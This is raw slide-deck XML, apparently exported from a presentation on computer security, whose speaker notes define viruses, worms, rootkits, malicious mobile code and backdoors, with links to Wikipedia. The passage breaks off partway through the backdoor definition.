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Lst>
  <p:sldSz cy="6858000" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Teko"/>
      <p:regular r:id="rId164"/>
      <p:bold r:id="rId165"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Narrow"/>
      <p:regular r:id="rId166"/>
      <p:bold r:id="rId167"/>
      <p:italic r:id="rId168"/>
      <p:boldItalic r:id="rId1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 uri="http://customooxmlschemas.google.com/">
      <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" r:id="rId170" roundtripDataSignature="AMtx7miC7lLdCd7ND2DeTXjeh9OM7HqXy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86BE483-798B-4F8A-A1FD-F16CD49BAE18}">
  <a:tblStyle styleId="{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}"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614F1EC8-023B-41F6-AEA7-A8C06D0698B5}"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170" Type="http://customschemas.google.com/relationships/presentationmetadata" Target="metadata"/><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font" Target="fonts/Teko-bold.fntdata"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide63.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Teko-regular.fntdata"/><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font" Target="fonts/ArialNarrow-boldItalic.fntdata"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialNarrow-italic.fntdata"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialNarrow-bold.fntdata"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialNarrow-regular.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Plaintext" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Authentication" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptographic_system" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptosystem" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Home_router" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malicious_software" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Quine_(computing)" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_program" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malware" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Chipset" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Algorithm" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Backdoor_(computing)#cite_note-1" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Intel_Active_Management_Technology" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_virus#cite_note-Stallings_2012_p.182-1" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Spyware#cite_note-FTC-REPORT-2005-1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malware" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Backdoor_(computing)#cite_note-2" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_program" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Software"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openspecs/windows_protocols/ms-dtyp/a66edeb1-52a0-4d64-a93b-2f5c833d7d92#gt_fd33af2e-e1ce-4f8e-a706-f9fb8123f9b0" TargetMode="Externa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b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>computer virus</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> is a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>malicious software</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> that, when executed, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>replicates</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> itself by modifying other </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>computer programs</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> and inserting its own code.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" baseline="30000" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> When this replication succeeds, the affected areas are then said to be "infected" with a computer virus.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>computer worm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> is a standalone </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>computer program</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> that replicates itself in order to spread to other computers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> is a collection of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>computer software</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, typically </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, designed to enable access to a computer or an area of its software that is not otherwise allowed.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Malicious mobile code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>is becoming a popular way to get malware installed on a computer. Malicious mobile code is malware that is obtained from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>remote servers</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>transferred across a network</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, and then </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>downloaded on to your computer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>. This type of code can be transmitted through interactive Web applications such as ActiveX controls, Flash animation, or JavaScript.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> is a method, often secret, of bypassing normal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> or encryption in a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>computer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> system, a product, or an embedded device (e.g. a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>home router</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>), or its embodiment, e.g. as part of a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId13">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>cryptosystem</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, an </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>chipset</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, or a "homunculus computer" —a tiny computer-within-a-computer (such as that as found in Intel's </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>AMT technology</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" baseline="30000" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
